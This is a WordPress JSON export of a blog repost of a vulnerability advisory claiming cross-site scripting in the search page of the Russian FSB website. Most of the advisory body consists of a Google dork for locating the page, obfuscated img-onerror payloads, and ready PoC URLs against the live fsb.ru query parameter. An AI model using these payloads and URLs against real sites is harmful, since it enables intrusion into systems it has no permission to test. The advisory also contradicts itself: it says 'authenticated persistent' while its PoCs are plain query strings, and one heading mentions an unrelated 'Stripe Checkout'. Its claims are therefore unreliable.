{"id":60579,"date":"2024-12-03T12:20:14","date_gmt":"2024-12-03T09:20:14","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/182897\/russiafsb-xss.txt"},"modified":"2024-12-03T12:20:14","modified_gmt":"2024-12-03T09:20:14","slug":"russian-fsb-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/russian-fsb-cross-site-scripting\/","title":{"rendered":"Russian FSB Cross Site Scripting"},"content":{"rendered":"<pre><code>\/*!<br>- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation<br>- # Authenticated Persistent XSS<br>- # GOOGLE DORK: inurl:fsb.ru\/fsb\/sh.htm?query=<br>- # DATE: 2024-11-29<br>- # SECURITY RESEARCHER: &nbsp;E1.Coders<br>- # VENDOR: FSB [ http:\/\/www.fsb.ru\/ ]- # SOFTWARE LINK: http:\/\/www.fsb.ru\/<br>- # CVSS: AV:N\/AC:L\/PR:H\/UI:N\/S:C<br>- # CWE: CWE-79<br>*\/<br>&nbsp;<br>&nbsp;<br>### -- [ Info: ]&nbsp;<br>[i] A valid persistent XSS vulnerability was discovered in the search section of the Federal Security Service of the Russian Federation website.<br>&nbsp;<br>[i] Vulnerable parameter(s): sh.htm?query= &nbsp;&lt; AND &gt; &nbsp;\/fsb\/sh.htm?query=<br>&nbsp;<br>&nbsp;<br>### -- [ Impact: ]&nbsp;<br>[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.<br>&nbsp;<br>&nbsp;<br>### -- [ Payloads: ]&nbsp;<br>`\"'&gt;&lt;img src=xxx:x \\x22onerror=javascript:alert(1)&gt;<br>&nbsp;<br>\"\/&gt;&lt;img\/onerror=\\x20javascript:alert(1)\\x20src=xxx:x \/&gt;<br>&nbsp;<br>`\"'&gt;&lt;img src=xxx:x onerror\\x09=javascript:alert(1)&gt;<br>&nbsp;<br>&nbsp;<br>### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ]&nbsp;<br>http:\/\/www.fsb.ru\/fsb\/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20onerror\\x09=javascript:alert(1)%3E<br>&nbsp;<br>http:\/\/www.fsb.ru\/fsb\/sh.htm?query=%22\/%3E%3Cimg\/onerror=\\x20javascript:alert(1)\\x20src=xxx:x%20\/%3E<br>&nbsp;<br>http:\/\/www.fsb.ru\/fsb\/sh.htm?query=`%22%27%3E%3Cimg%20src=xxx:x%20\\x22onerror=javascript:alert(1)%3E<br>&nbsp;<br>&nbsp;<br>### -- [ Contacts: ]&nbsp;<br>[+] E-Mail: E1.Coders@Mail.Ru<br>&nbsp;<br>[+] GitHub: @e1coders<br><\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\/*!- # VULNERABILITY: Cross Site Scripting Federal Security Service of the Russian Federation- # Authenticated Persistent XSS- # GOOGLE DORK: inurl:fsb.ru\/fsb\/sh.htm?query=- # DATE: 2024-11-29- # SECURITY RESEARCHER: &nbsp;E1.Coders- # VENDOR: FSB [ http:\/\/www.fsb.ru\/ ]- # SOFTWARE LINK: http:\/\/www.fsb.ru\/- # CVSS: AV:N\/AC:L\/PR:H\/UI:N\/S:C- # CWE: CWE-79*\/&nbsp;&nbsp;### &#8212; [ Info: ]&nbsp;[i] A valid persistent XSS vulnerability was discovered &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-60579","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60579","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=60579"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/60579\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=60579"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=60579"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=60579"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}